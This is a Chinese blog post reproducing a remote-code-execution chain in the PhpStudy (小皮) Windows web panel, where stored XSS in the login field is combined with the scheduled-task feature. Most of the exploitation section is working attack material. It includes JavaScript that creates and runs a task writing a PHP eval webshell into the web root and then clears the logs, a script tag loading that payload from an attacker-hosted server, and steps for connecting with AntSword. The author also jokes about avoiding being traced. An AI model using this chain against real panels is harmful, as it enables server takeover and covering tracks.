小皮web面版RCE漏洞复现

1、漏洞介绍　

PhpStudy国内12年老牌公益软件，集安全、高效、功能与一体，已获得全球用户认可安装，运维也高效。 支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。小皮 Windows web 面板存在存储型 xss 漏洞，结合后台计划任务即可实现 RCE。

2、影响版本

 三、环境搭建

目前官网的安装包已经修复漏洞，需要下载

提供csdn下载链接，博主本文用到的环境，效率换效率 把积分掏出来吧：）

https://download.csdn.net/download/qq_34914659/87657579

安装点击执行即可，安装成功后

访问小皮面板界面，注意如果xss将系统打坏，建议重新安装

 四、漏洞检测

测试漏洞

<script>alert(x)</script>

登录处进行xss漏洞测试，完成后登录首页可以触发xss漏洞

如果一次不成功多试几次即可

清除操作日志可删除xss漏洞

五、漏洞利用

下面利用定时计划+xss进行getshell漏洞利用

1.首先先准备一个js文件，放在自己的vps上

function poc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    var id=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
function save(){
  var data=new Object();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute = "20";
  data.shell='echo "<?php @eval($_POST[2023]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/test.php';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

2.小皮面版功能处找到网站目录，写入webshell

3.在vps上开启一个http服务..... 咳咳，补充一下，上篇weblogic的vps已经到期了，这次应该溯不到我了吧 :)

python3 -m http.server 8099
把准备好的js文件上传
如果http://ip:端口/xxx.js 可以访问即可

4.打开登录页面

用户名输入poc，密码任意

<script src=http://打码IP:8099/shell.js></script>

 登录查看定时任务，可以发现新建了一个任务，此任务可以定时写入小可爱

根目录已经写入小可爱

 此文件得位置是网站根目录，直接访问链接即可

AntSword连接，

192.168.182.1/test.php

补充:

此处有个小坑，就是说小皮的程序语言这里是需要打开php7.3.4，否则会导致php文件不能执行，导致AntSword连接不上小可爱

 

还有一点小坑就是nginx和apache需要启动，然后就可以了。如遇到其他问题可以评论一起讨论下

 

参考链接

小皮 Windows web 面板 漏洞详解

phpstudy 小皮web面板 RCE漏洞_小皮面板漏洞_安全大哥的博客-CSDN博客